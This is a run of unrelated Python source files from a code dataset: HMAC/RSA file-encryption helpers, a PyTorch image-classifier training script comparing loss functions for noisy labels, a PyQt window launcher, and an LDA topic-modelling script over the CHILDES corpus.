\"rb\") as file:\r\n json_str = file.read()\r\n \r\n # HMAC the file\r\n h = hmac.HMAC(HMACKey, hashes.SHA256(), backend=default_backend())\r\n h.update(json_str)\r\n h.finalize()\r\n 
\r\n    h2 = hmac.HMAC(HMACKey, hashes.SHA256(), backend=default_backend())\r\n    h2.update(json_str)\r\n    tag = h2.finalize()\r\n    \r\n    # Extract the filename\r\n    file_name = os.path.basename(json_filepath)\r\n    \r\n    # Write the tag (raw bytes) to disk\r\n    fh = open(file_name + \" HMAC.txt\", \"wb\")\r\n    fh.write(tag)\r\n    fh.close()\r\n    \r\n    # Return the hash filepath\r\n    return file_name + \" HMAC.txt\"\r\n\r\ndef MydecryptMAC(HMAC_filepath, HMACkey, json_filepath):\r\n    \r\n    # Read the stored tag from disk\r\n    with open(HMAC_filepath, \"rb\") as file:\r\n        HMAC_str = file.read()\r\n    \r\n    # Read the encrypted JSON file so its tag can be recomputed\r\n    with open(json_filepath, \"rb\") as file:\r\n        json_str = file.read()\r\n    \r\n    # Verify the file (raises InvalidSignature on a mismatch)\r\n    h = hmac.HMAC(HMACkey, hashes.SHA256(), backend=default_backend())\r\n    h.update(json_str)\r\n    h.verify(HMAC_str)\r\n    \r\n    # Decrypt the file\r\n    pt_filepath = MyRSADecrypt(json_filepath)\r\n    \r\n    # Return the plaintext filepath\r\n    return pt_filepath\r\n    \r\ndef MyfileEncryptMAC(filepath, HMACkey, RSA_publickey_filepath):\r\n    \r\n    # Encrypt the file\r\n    json_filepath = MyRSAEncrypt(filepath, RSA_publickey_filepath)\r\n    \r\n    # Read the file from disk\r\n    with open(json_filepath, \"rb\") as file:\r\n        json_str = file.read()\r\n    \r\n    # HMAC the file, keeping the tag returned by finalize()\r\n    h = hmac.HMAC(HMACkey, hashes.SHA256(), backend=default_backend())\r\n    h.update(json_str)\r\n    tag = h.finalize()\r\n    \r\n    # Extract the filename\r\n    file_name = os.path.basename(json_filepath)\r\n    \r\n    # Write the tag (raw bytes) to disk\r\n    fh = open(file_name + \" HMAC.txt\", \"wb\")\r\n    fh.write(tag)\r\n    fh.close()\r\n    \r\n    # Return the hash filepath\r\n    return file_name + \" HMAC.txt\"\r\n\r\n\r\ndef MyfileDecryptMAC(HMAC_filepath, HMACkey, json_filepath):\r\n    \r\n    # Read the HMAC file from disk\r\n    with open(HMAC_filepath, \"rb\") as file:\r\n        HMAC_str = file.read()\r\n    \r\n    # Read the encrypted JSON file so its tag can be recomputed\r\n    with open(json_filepath, \"rb\") as file:\r\n        json_str = file.read()\r\n    \r\n    # Verify the file (raises InvalidSignature on a mismatch)\r\n    h = hmac.HMAC(HMACkey, hashes.SHA256(), backend=default_backend())\r\n    h.update(json_str)\r\n    h.verify(HMAC_str)\r\n    \r\n    # Decrypt the file\r\n    pt_filepath = Myfiledecrypt(json_filepath)\r\n    \r\n    # Return the plaintext filepath\r\n    return pt_filepath","sub_path":"MyEncrypt/myEncrypt.py","file_name":"myEncrypt.py","file_ext":"py","file_size_in_byte":10046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} {"seq_id":"511727431","text":"# original code: https://github.com/dyhan0920/PyramidNet-PyTorch/blob/master/train.py\nimport sys\nimport time\nimport argparse\nimport os\nimport shutil\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.nn.functional as F\nimport torch.backends.cudnn as cudnn\nimport torch.optim\nimport torch.utils.data\nimport torch.utils.data.distributed\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\nimport torchvision.models as models\n\nfrom models import resnet as RN\nfrom models import pyramidnet as PYRM\nfrom models import vgg as VGG\nfrom models import wideresnet as WR\nfrom models import shufflenetv2 as SN\nfrom models import mobilenetv2 as MN\nfrom models import resnext as RNX\nfrom models import densenet as DN\nfrom models.iccv19_resnet import *\n#from models.iccv19_resnet_ds import *\nfrom models.preactresnet import CIFAR_ResNet18, CIFAR_ResNet34\nfrom tensorboardX import SummaryWriter\nfrom loss_all_methods import SCELoss, label_smooth, generalized_cross_entropy, joint_optimization, boot_soft, boot_hard, Forward, Backward, DisturbLabel, PC\nimport random\nimport utils\nimport numpy as np\nimport cv2\nimport warnings\nfrom PIL import Image, ImageFile\nImageFile.LOAD_TRUNCATED_IMAGES=True\n\nwarnings.filterwarnings(\"ignore\")\n\n
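# model_names enumerates the torchvision architectures; it is carried over from\n# the reference ImageNet example and is not otherwise used below.\n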
model_names = sorted(name for name in models.__dict__\n                     if name.islower() and not name.startswith(\"__\")\n                     and callable(models.__dict__[name]))\n\n\nparser = argparse.ArgumentParser(description='PyTorch CIFAR-10, CIFAR-100 and ImageNet-1k Training')\nparser.add_argument('--net_type', default='pyramidnet', type=str,\n                    help='networktype: resnet, and pyramidnet')\nparser.add_argument('-j', '--workers', default=16, type=int, metavar='N',\n                    help='number of data loading workers (default: 16)')\nparser.add_argument('--start_epoch', default=0, type=int, metavar='N',\n                    help='start epoch to run')\nparser.add_argument('--epochs', default=90, type=int, metavar='N',\n                    help='number of total epochs to run')\nparser.add_argument('-b', '--batch_size', default=128, type=int,\n                    metavar='N', help='mini-batch size (default: 128)')\nparser.add_argument('--lr', '--learning-rate', default=0.1, type=float,\n                    metavar='LR', help='initial learning rate')\nparser.add_argument('--momentum', default=0.9, type=float, metavar='M',\n                    help='momentum')\nparser.add_argument('--weight-decay', '--wd', default=1e-4, type=float,\n                    metavar='W', help='weight decay (default: 1e-4)')\nparser.add_argument('--print-freq', '-p', default=1000, type=int,\n                    metavar='N', help='print frequency (default: 1000)')\nparser.add_argument('--depth', default=32, type=int,\n                    help='depth of the network (default: 32)')\nparser.add_argument('--no-bottleneck', dest='bottleneck', action='store_false',\n                    help='to use basicblock for CIFAR datasets (default: bottleneck)')\nparser.add_argument('--dataset', dest='dataset', default='imagenet', type=str,\n                    help='dataset (options: cifar10, cifar100, and imagenet)')\nparser.add_argument('--no-verbose', dest='verbose', action='store_false',\n                    help='to print the status at every iteration')\nparser.add_argument('--alpha', default=300, type=float,\n                    help='number of new channel increases per depth (default: 300)')\nparser.add_argument('--expname', default='TEST', type=str,\n                    help='name of experiment')\nparser.add_argument('--save_dir', default='./', type=str,\n                    help='model saved dir')\nparser.add_argument('--seed', type=int, default=2019, help='random seed')\nparser.add_argument('--resume', default=None, type=str, metavar='PATH',\n                    help='path to latest checkpoint (default: none)')\nparser.add_argument('--pretrained', default='./runs/pretrained_model/resnet50-19c8e357.pth', type=str, metavar='PATH',\n                    help='path to resnet50 pretrained pth.')\nparser.add_argument('--dali_cpu', action='store_true',\n                    help='Runs CPU based version of DALI pipeline.')\nparser.add_argument('--width', default=None, type=int, help='the widen factor of wideresnet')\n\nparser.add_argument(\"--local_rank\", default=0, type=int)\nparser.add_argument(\"--phase\", default=None, type=int)\n\nparser.add_argument('--theta', default=0.5, type=float)\nparser.add_argument('--method', default=None, type=str, help='ce, ols, sce, ls, gce, jo, bootsoft, boothard, forward, backward, disturb, PC')\nparser.add_argument('--olsalpha', default=None, type=float)\nparser.add_argument('--T', default=1.0, type=float, help='temperature to scale')\n\nparser.set_defaults(bottleneck=True)\nparser.set_defaults(verbose=True)\n\nbest_err1 = 100\nbest_err5 = 100\nnumberofclass = 1000\n\ndef main():\n    global args, best_err1, best_err5, numberofclass\n    args = parser.parse_args()\n    \n    assert args.method in ['ce', 'ols', 'sce', 'ls', 'gce', 'jo', 'bootsoft', 'boothard', 'forward', 'backward', 'disturb', 'PC'], \\\n        \"method must be the one of 'ce', 'ols', 'sce', 'ls', 'gce', 'jo', 'bootsoft', 'boothard', 'forward', 'backward', 'disturb', 'PC' \"\n    \n    args.gpu = 0\n    args.world_size = 1\n    \n    print(args)\n    log_dir = '%s/runs/record_dir/%s/' % 
(args.save_dir, args.expname)\n writer = SummaryWriter(log_dir=log_dir)\n \n if args.seed is not None:\n print('set the same seed for all.....')\n random.seed(args.seed)\n torch.manual_seed(args.seed)\n np.random.seed(args.seed)\n torch.cuda.manual_seed(args.seed)\n\n\n if args.dataset.startswith('cifar'):\n normalize = transforms.Normalize(mean=[x / 255.0 for x in [125.3, 123.0, 113.9]],\n std=[x / 255.0 for x in [63.0, 62.1, 66.7]])\n\n transform_train = transforms.Compose([\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n normalize,\n ])\n\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n normalize\n ])\n\n if args.dataset == 'cifar100':\n train_loader = torch.utils.data.DataLoader(\n datasets.CIFAR100('./data', train=True, download=True, transform=transform_train),\n batch_size=args.batch_size, shuffle=True, num_workers=args.workers, pin_memory=False)\n val_loader = torch.utils.data.DataLoader(\n datasets.CIFAR100('./data', train=False, transform=transform_test),\n batch_size=args.batch_size, shuffle=True, num_workers=args.workers, pin_memory=False)\n numberofclass = 100\n elif args.dataset == 'cifar10':\n train_loader = torch.utils.data.DataLoader(\n datasets.CIFAR10('./data', train=True, download=True, transform=transform_train),\n batch_size=args.batch_size, shuffle=True, num_workers=args.workers, pin_memory=False)\n val_loader = torch.utils.data.DataLoader(\n datasets.CIFAR10('./data', train=False, transform=transform_test),\n batch_size=args.batch_size, shuffle=False, num_workers=args.workers, pin_memory=False)\n numberofclass = 10\n else:\n raise Exception('unknown dataset: {}'.format(args.dataset))\n \n elif args.dataset == 'imagenet':\n traindir = os.path.join('./data/ILSVRC1/train')\n valdir = os.path.join('./data/ILSVRC1/val1')\n normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n\n jittering = utils.ColorJitter(brightness=0.4, contrast=0.4,\n saturation=0.4)\n lighting = utils.Lighting(alphastd=0.1,\n eigval=[0.2175, 0.0188, 0.0045],\n eigvec=[[-0.5675, 0.7192, 0.4009],\n [-0.5808, -0.0045, -0.8140],\n [-0.5836, -0.6948, 0.4203]])\n\n train_dataset = datasets.ImageFolder(\n traindir,\n transforms.Compose([\n transforms.RandomResizedCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n jittering,\n lighting,\n normalize,\n ]))\n\n train_sampler = None\n\n train_loader = torch.utils.data.DataLoader(\n train_dataset, batch_size=args.batch_size, shuffle=(train_sampler is None),\n num_workers=args.workers, pin_memory=False, sampler=train_sampler)\n\n val_loader = torch.utils.data.DataLoader(\n datasets.ImageFolder(valdir, transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n normalize,\n ])),\n batch_size=args.batch_size, shuffle=False,\n num_workers=args.workers, pin_memory=False)\n numberofclass = 1000\n\n \n \n print(\"=> creating model '{}'\".format(args.net_type))\n # define loss function (criterion) and optimizer\n solver = Solver()\n\n solver.model = solver.model.cuda()\n print('the number of model parameters: {}'.format(sum([p.data.nelement() for p in solver.model.parameters()])))\n cudnn.benchmark = True\n\n if args.resume:\n if os.path.isfile(args.resume):\n print(\"=> loading checkpoint '{}'\".format(args.resume))\n checkpoint = torch.load(args.resume)\n args.start_epoch = checkpoint['epoch']\n best_err1 = checkpoint['best_err1']\n solver.model.load_state_dict(checkpoint['state_dict'])\n 
solver.optimizer.load_state_dict(checkpoint['optimizer'])\n print(\"=> loaded checkpoint '{}' (epoch {})\"\n .format(args.resume, checkpoint['epoch']))\n \n \n for epoch in range(args.start_epoch, args.epochs): \n print('current os time = ', time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\n adjust_learning_rate(solver.optimizer, epoch)\n # train for one epoch\n train_loss = solver.train(train_loader, epoch)\n # evaluate on validation set\n err1, err5, val_loss = solver.validate(val_loader, epoch)\n\n writer.add_scalar('training loss', train_loss, epoch)\n writer.add_scalar('testing loss', val_loss, epoch)\n writer.add_scalar('top1 error', err1, epoch)\n writer.add_scalar('top5 error', err5, epoch)\n\n # remember best prec@1 and save checkpoint\n is_best = err1 <= best_err1\n best_err1 = min(err1, best_err1)\n if is_best:\n best_err5 = err5\n \n print('Current best accuracy (top-1 and 5 error):', best_err1, best_err5)\n save_checkpoint({\n 'epoch': epoch,\n 'arch': args.net_type,\n 'state_dict': solver.model.state_dict(),\n 'best_err1': best_err1,\n 'best_err5': best_err5,\n 'optimizer': solver.optimizer.state_dict(),\n }, is_best)\n\n print('Best accuracy (top-1 and 5 error):', best_err1, best_err5)\n print('method = {}, expname = {}'.format(args.method, args.expname))\n loss_dir = \"%s/runs/record_dir/%s/\" % (args.save_dir, args.expname)\n writer.export_scalars_to_json(loss_dir + 'loss.json')\n writer.close()\n\nclass Solver():\n def __init__(self):\n super(Solver, self).__init__()\n global numberofclass \n \n #define the network\n if args.net_type == 'resnet':\n self.model = RN.ResNet(dataset=args.dataset, depth=args.depth, num_classes=numberofclass, bottleneck=args.bottleneck)\n \n elif args.net_type == 'pyramidnet':\n self.model = PYRM.PyramidNet(args.dataset, args.depth, args.alpha, numberofclass,\n args.bottleneck)\n \n elif args.net_type == 'wideresnet':\n self.model = WR.WideResNet(depth=args.depth, num_classes=numberofclass, widen_factor=args.width)\n \n elif args.net_type == 'vggnet':\n self.model = VGG.vgg16(num_classes=numberofclass)\n \n elif args.net_type == 'mobilenet':\n self.model = MN.mobile_half(num_classes=numberofclass)\n \n elif args.net_type == 'shufflenet':\n self.model = SN.ShuffleV2(num_classes=numberofclass)\n \n elif args.net_type == 'densenet':\n self.model = DN.densenet_cifar(num_classes=numberofclass)\n \n elif args.net_type == 'resnext29-2':\n self.model = RNX.ResNeXt29_2x64d(num_classes=numberofclass)\n elif args.net_type == 'resnext29-4':\n self.model = RNX.ResNeXt29_4x64d(num_classes=numberofclass)\n elif args.net_type == 'resnext29-32':\n self.model = RNX.ResNeXt29_32x4d(num_classes=numberofclass)\n \n elif args.net_type == 'imagenetresnet18':\n self.model = multi_resnet18_kd(num_classes=numberofclass)\n elif args.net_type == 'imagenetresnet34':\n self.model = multi_resnet34_kd(num_classes=numberofclass)\n elif args.net_type == 'imagenetresnet50':\n self.model = multi_resnet50_kd(num_classes=numberofclass)\n elif args.net_type == 'imagenetresnet101':\n self.model = multi_resnet101_kd(num_classes=numberofclass)\n elif args.net_type == 'imagenetresnet152':\n self.model = multi_resnet152_kd(num_classes=numberofclass)\n else:\n raise Exception('unknown network architecture: {}'.format(args.net_type))\n\n \n\n \n self.optimizer = torch.optim.SGD(self.model.parameters(), args.lr,\n momentum=args.momentum,\n weight_decay=args.weight_decay, nesterov=True)\n self.loss_lams = torch.zeros(numberofclass, numberofclass, dtype=torch.float32).cuda()\n 
self.loss_lams.requires_grad = False \n #define the loss function\n if args.method == 'ce':\n self.criterion = nn.CrossEntropyLoss()\n elif args.method == 'sce':\n if args.dataset == 'cifar10':\n self.criterion = SCELoss(alpha=0.1, beta=1.0, num_classes=numberofclass)\n else:\n self.criterion = SCELoss(alpha=6.0, beta=0.1, num_classes=numberofclass)\n elif args.method == 'ls':\n self.criterion = label_smooth(num_classes=numberofclass)\n elif args.method == 'gce':\n self.criterion = generalized_cross_entropy(num_classes=numberofclass)\n elif args.method == 'jo':\n self.criterion = joint_optimization(num_classes=numberofclass)\n elif args.method == 'bootsoft':\n self.criterion = boot_soft(num_classes=numberofclass)\n elif args.method == 'boothard':\n self.criterion = boot_hard(num_classes=numberofclass)\n elif args.method == 'forward':\n self.criterion = Forward(num_classes=numberofclass)\n elif args.method == 'backward':\n self.criterion = Backward(num_classes=numberofclass)\n elif args.method == 'disturb':\n self.criterion = DisturbLabel(num_classes=numberofclass)\n elif args.method == 'ols':\n self.criterion = nn.CrossEntropyLoss()\n elif args.method == 'PC':\n self.criterion = PC(100)\n self.criterion = self.criterion.cuda()\n \n\n def update_loss_lams(self, output, target):\n with torch.no_grad():\n logits = torch.softmax(output, dim=1)\n sort_args = torch.argsort(logits, dim=1, descending=True)\n for k in range(output.shape[0]):\n if target[k] != sort_args[k, 0]:\n continue\n self.cur_epoch_lams[target[k]] += logits[k]\n self.cur_epoch_cnt[target[k]] += 1\n def update_loss_lams2(self, output, target):\n with torch.no_grad():\n logits = output / args.T\n sort_args = torch.argsort(logits, dim=1, descending=True)\n for k in range(output.shape[0]):\n if target[k] != sort_args[k, 0]:\n continue\n self.cur_epoch_lams[target[k]] += logits[k]\n self.cur_epoch_cnt[target[k]] += 1\n \n \n def soft_cross_entropy(self, output, target): \n target_prob = torch.zeros_like(output)\n batch = output.shape[0]\n for k in range(batch):\n target_prob[k] = self.loss_lams[target[k]]\n log_like = -torch.nn.functional.log_softmax(output, dim=1)\n loss = torch.sum(torch.mul(log_like, target_prob)) / batch \n return loss\n def kd_loss(self, output, target):\n target_prob = torch.zeros_like(output)\n batch = output.shape[0]\n for k in range(batch):\n target_prob[k] = self.loss_lams[target[k]]\n ps = torch.nn.functional.log_softmax(output / args.T, dim=1)\n log_like = torch.nn.functional.kl_div(ps, target_prob, size_average=False)\n log_like = log_like * (args.T ** 2) / batch\n return log_like\n def sce_loss(self, output, onehot):\n log_like = -torch.nn.functional.log_softmax(output, dim=1)\n loss = torch.sum(torch.mul(log_like, onehot)) / output.shape[0]\n return loss\n \n def train(self, train_loader, epoch):\n batch_time = AverageMeter()\n data_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n \n global numberofclass \n\n # switch to train mode\n self.model.train()\n end = time.time()\n current_LR = get_learning_rate(self.optimizer)[0]\n \n self.cur_epoch_lams = torch.zeros(numberofclass, numberofclass, dtype=torch.float32).cuda()\n self.cur_epoch_cnt = torch.zeros(numberofclass, dtype=torch.float32).cuda()\n self.cur_epoch_lams.requires_grad = False\n self.cur_epoch_cnt.requires_grad = False\n for i, (input, target) in enumerate(train_loader):\n # measure data loading time\n data_time.update(time.time() - end)\n\n input = input.cuda()\n target = target.cuda()\n 
input_var = torch.autograd.Variable(input, requires_grad=True)\n \n \n # compute output\n output = self.model(input_var)\n \n if args.method == 'ols':\n self.update_loss_lams(output, target)\n args.T = 1.\n loss = 0.5 * self.criterion(output, target) + \\\n 0.5 * self.soft_cross_entropy(output, target)\n elif args.method == 'ls':\n loss = self.criterion(output, target)\n elif args.method == 'PC':\n if epoch < 200:\n loss = torch.nn.functional.cross_entropy(output, \\\n target)\n else:\n loss = self.criterion(output, target)\n else:\n loss = self.criterion(output, target)\n \n #measure accuracy and record loss\n err1, err5 = accuracy(output.data, target, topk=(1, 5))\n\n losses.update(loss.item(), input.size(0))\n top1.update(err1.item(), input.size(0))\n top5.update(err5.item(), input.size(0))\n\n # compute gradient and do SGD step\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n \n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n \n \n \n if i % args.print_freq == 0 and args.verbose == True:\n print('Epoch: [{0}/{1}][{2}/{3}]\\t'\n 'LR: {LR:.6f}\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Data {data_time.val:.3f} ({data_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Top 1-err {top1.val:.4f} ({top1.avg:.4f})\\t'\n 'Top 5-err {top5.val:.4f} ({top5.avg:.4f})'.format(\n epoch, args.epochs, i, len(train_loader), LR=current_LR, batch_time=batch_time,\n data_time=data_time, loss=losses, top1=top1, top5=top5))\n \n if args.method == 'ols': \n for cls in range(numberofclass):\n if self.cur_epoch_cnt[cls].max() < 0.5:\n self.loss_lams[cls] = 1. / numberofclass \n else:\n self.loss_lams[cls] = self.cur_epoch_lams[cls] / self.cur_epoch_cnt[cls] \n return losses.avg\n\n def validate(self, val_loader, epoch):\n batch_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n\n self.model.eval()\n end = time.time()\n\n for i, (input, target) in enumerate(val_loader):\n target = target.cuda()\n input = input.cuda()\n input_var = torch.autograd.Variable(input)\n target_var = torch.autograd.Variable(target)\n with torch.no_grad():\n output = self.model(input_var)\n loss = self.criterion(output, target_var)\n # measure accuracy and record loss\n err1, err5 = accuracy(output.data, target, topk=(1, 5))\n\n losses.update(loss.item(), input.size(0))\n\n top1.update(err1.item(), input.size(0))\n top5.update(err5.item(), input.size(0))\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if i % args.print_freq == 0 and args.verbose == True:\n print('Test (on val set): [{0}/{1}][{2}/{3}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Top 1-err {top1.val:.4f} ({top1.avg:.4f})\\t'\n 'Top 5-err {top5.val:.4f} ({top5.avg:.4f})'.format(\n epoch, args.epochs, i, 196, batch_time=batch_time, loss=losses,\n top1=top1, top5=top5))\n\n print('* Epoch: [{0}/{1}]\\t Top 1-err {top1.avg:.3f} Top 5-err {top5.avg:.3f}\\t Test Loss {loss.avg:.3f}'.format(\n epoch, args.epochs, top1=top1, top5=top5, loss=losses))\n return top1.avg, top5.avg, losses.avg\n def save_scripts(self, val_loader, epoch, prop):\n batch_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n\n self.model.eval()\n end = time.time()\n\n save_name = args.net_type + '_' + args.method + '_' + prop \n embedding = []\n labels = []\n\n for i, (input, target) in enumerate(val_loader):\n if i > 
80:\n break\n target = target.cuda()\n input = input.cuda()\n input_var = torch.autograd.Variable(input)\n target_var = torch.autograd.Variable(target)\n with torch.no_grad():\n output, ebd = self.model(input_var)\n for j in range(ebd.shape[0]):\n embedding.append(ebd[j].detach().cpu().numpy())\n labels.append(target[j].detach().cpu().numpy())\n \n loss = self.criterion(output, target_var)\n # measure accuracy and record loss\n err1, err5 = accuracy(output.data, target, topk=(1, 5))\n\n losses.update(loss.item(), input.size(0))\n\n top1.update(err1.item(), input.size(0))\n top5.update(err5.item(), input.size(0))\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if i % args.print_freq == 0 and args.verbose == True:\n print('Test (on val set): [{0}/{1}][{2}/{3}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Top 1-err {top1.val:.4f} ({top1.avg:.4f})\\t'\n 'Top 5-err {top5.val:.4f} ({top5.avg:.4f})'.format(\n epoch, args.epochs, i, 196, batch_time=batch_time, loss=losses,\n top1=top1, top5=top5))\n embedding = np.array(embedding)\n labels = np.array(labels)\n print('------',embedding.shape)\n for kk in range(10):\n print(embedding[kk].shape)\n np.save('./embeddings/' + save_name + '_' + 'emd.npy', embedding)\n np.save('./embeddings/' + save_name + '_' + 'labels.npy', labels)\n \n print('* Epoch: [{0}/{1}]\\t Top 1-err {top1.avg:.3f} Top 5-err {top5.avg:.3f}\\t Test Loss {loss.avg:.3f}'.format(\n epoch, args.epochs, top1=top1, top5=top5, loss=losses))\n return top1.avg, top5.avg, losses.avg\n \n \n def visualize(self, dataloader, classes_id = [5, 2, 1], samples_per_class = 100):\n data = torch.zeros(samples_per_class * len(classes_id), 256, dtype=torch.float32)\n target = torch.zeros(samples_per_class * len(classes_id), dtype=torch.float32)\n cnt = torch.ones(len(classes_id), dtype=torch.long) * samples_per_class\n cur_cnt = 0\n with torch.no_grad():\n for i, (input, y) in enumerate(dataloader):\n output, attens = self.model(input)\n if cnt.sum() == 0:\n break\n for kk in range(input.shape[0]):\n if int(y[kk]) in classes_id and cnt[classes_id.index(y[kk])] > 0:\n data[cur_cnt] = attens[kk]\n target[cur_cnt] = y[kk]\n \n cnt[classes_id.index(y[kk])] = cnt[classes_id.index(y[kk])] - 1\n cur_cnt += 1\n \n return data, target\n\ndef save_checkpoint(state, is_best, filename='checkpoint.pth.tar'):\n directory = \"%s/runs/record_dir/%s/\" % (args.save_dir, args.expname)\n if not os.path.exists(directory):\n os.makedirs(directory)\n filename = directory + filename\n torch.save(state, filename)\n if is_best:\n shutil.copyfile(filename, '%s/runs/record_dir/%s/' % (args.save_dir, args.expname) + 'model_best.pth.tar')\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n\ndef adjust_learning_rate(optimizer, epoch):\n \"\"\"Sets the learning rate to the initial LR decayed by 10 every 30 epochs\"\"\"\n if args.dataset.startswith('cifar') or args.dataset == ('tiny-imagenet'):\n lr = args.lr * (0.1 ** (epoch // (args.epochs * 0.5))) * (0.1 ** (epoch // (args.epochs * 0.75)))\n elif args.dataset == ('imagenet'):\n if args.epochs == 300:\n lr = args.lr * (0.1 ** (epoch // 75))\n elif args.epochs > 30:\n lr = args.lr * (0.1 ** 
(epoch // 30))\n        else:\n            lr = args.lr * (0.1 ** (epoch // 10))\n        #else:\n        #    if epoch < 10:\n        #        lr = args.lr\n        #    elif epoch < 40:\n        #        lr = args.lr * 0.1\n        #    else:\n        #        lr = args.lr * 0.01\n    for param_group in optimizer.param_groups:\n        param_group['lr'] = lr\n\n\ndef get_learning_rate(optimizer):\n    lr = []\n    for param_group in optimizer.param_groups:\n        lr += [param_group['lr']]\n    return lr\n\n\ndef accuracy(output, target, topk=(1,)):\n    \"\"\"Computes the precision@k for the specified values of k\"\"\"\n    maxk = max(topk)\n    batch_size = target.size(0)\n\n    _, pred = output.topk(maxk, 1, True, True)\n    pred = pred.t()\n    correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n    res = []\n    for k in topk:\n        correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)\n        wrong_k = batch_size - correct_k\n        res.append(wrong_k.mul_(100.0 / batch_size))\n\n    return res\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"cifar/scripts/train_cifar_all_methods.py","file_name":"train_cifar_all_methods.py","file_ext":"py","file_size_in_byte":28485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} {"seq_id":"156303977","text":"# -*- coding: utf-8 -*-\n# author: Guoanboyu\n# email: guoappserver@gmail.com\n\n#main.pyw\nimport sys\nfrom PyQt4 import QtCore, QtGui\n\nfrom cloud_picture.untitled import Ui_MainWindow\n\nclass MyForm(QtGui.QMainWindow):\n    def __init__(self, parent = None):\n        QtGui.QMainWindow.__init__(self,parent)\n        self.ui = Ui_MainWindow()\n        self.ui.setupUi(self)\n\nif __name__ == '__main__':\n    app = QtGui.QApplication(sys.argv)\n    form = MyForm()\n    form.show()\n    sys.exit(app.exec_())","sub_path":"cloud_picture/main_window.py","file_name":"main_window.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} {"seq_id":"312161056","text":"import nltk\nimport time\nimport csv\nfrom gensim import corpora\nfrom gensim.models.ldamodel import LdaModel\nfrom os import listdir\nfrom nltk.corpus.reader import CHILDESCorpusReader\nfrom nltk.stem.snowball import SnowballStemmer\nfrom nltk.corpus import stopwords, wordnet\n\nstart = time.time()\ncorpus_root = nltk.data.find('corpora/childes/data-xml/Eng-USA-MOR/')\nfolders = listdir('C:/nltk_data/corpora/childes/data-xml/Eng-USA-MOR')\n\n#stemmer = SnowballStemmer(\"english\")\n\nsw = stopwords.words('english')\nsw.extend(['xxx', 'yyy', 'www', 'huh', 'yeah', 'ever', 'even', 'anyway', 'everybody',\n'yes', 'mhm', 'yep', 'uhhuh', 'alright', 'never', 'sometimes', 'either', 'everyone',\n'gonna', 'goin', 'another', 'okay', 'hey', 'anything', 'ready', 'uhuh', 'ouch', 'only',\n'away', 'sure', 'well', 'right', 'okay', 'would', 'around', 'across', 'everything',\n'maybe', 'big', 'little', 'nice', 'wow', 'new', 'cool', 'else', 'ago', 'almost', 'another',\n'ahead', 'always', 'already', 'whoops', 'em', 'wan', 'much', 'nope', 'hum', 'anyways',\n'yet', 'though', 'somethin', 'cha', 'anything', 'somebody', 'may', 'still', 'uhoh',\n'also', 'instead', 'whose', 'without', 'behind', 'anybody', 'any', 'away', 'why',\n'please', 'yay', 'oops', 'any', 'please', 'another', 'something', 'very'])\n#sw = [stemmer.stem(item) for item in sw]\n\nwith open ('animal.csv', 'rb') as f:\n    reader = csv.reader(f)\n    animal = []\n    for row in reader:\n        animal.extend(row)\n\nchildes = CHILDESCorpusReader(corpus_root, '.*.xml', lazy=False)\nfiles = childes.fileids()\nresultlist = []\n\nfor filename in files:\n    sents = childes.sents(filename)[0]\n    for sent in sents:\n        result_lower = 
[item.lower() for item in sent]\n #result_stem = [stemmer.stem(item) for item in result_lower]\n result_clean = [item for item in result_lower if '\\'' not in item \n and '_' not in item and len(item) > 1]\n result = [item for item in result_clean if item not in sw]\n resultlist.append(result)\nprint(resultlist[0])\n\n \ndictionary = corpora.Dictionary(resultlist)\ncorpus = [dictionary.doc2bow(text) for text in resultlist]\n\nlda = LdaModel(corpus = corpus, id2word = dictionary, num_topics = 500)\ntopiclist = lda.print_topics(num_topics = 500, num_words = 50)\nlda.save('childs_sent_500.model')","sub_path":"childes/childes-500-sent.py","file_name":"childes-500-sent.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"15127943","text":"\"\"\" A PyFace widget for a command binding. \"\"\"\n\n\nimport wx\n\nfrom envisage.import_manager import ImportManager\nfrom pyface.api import Widget\nfrom traits.api import Instance\n\nfrom pgv.red.ui.command_library import CommandBinding\nfrom pgv.red.ui.keyboard import get_key_combination_name\n\n\nclass CommandBindingWidget(Widget):\n \"\"\" A PyFace widget for a command binding. \"\"\"\n\n #### 'object' protocol ####################################################\n\n def __init__(self, **traits):\n 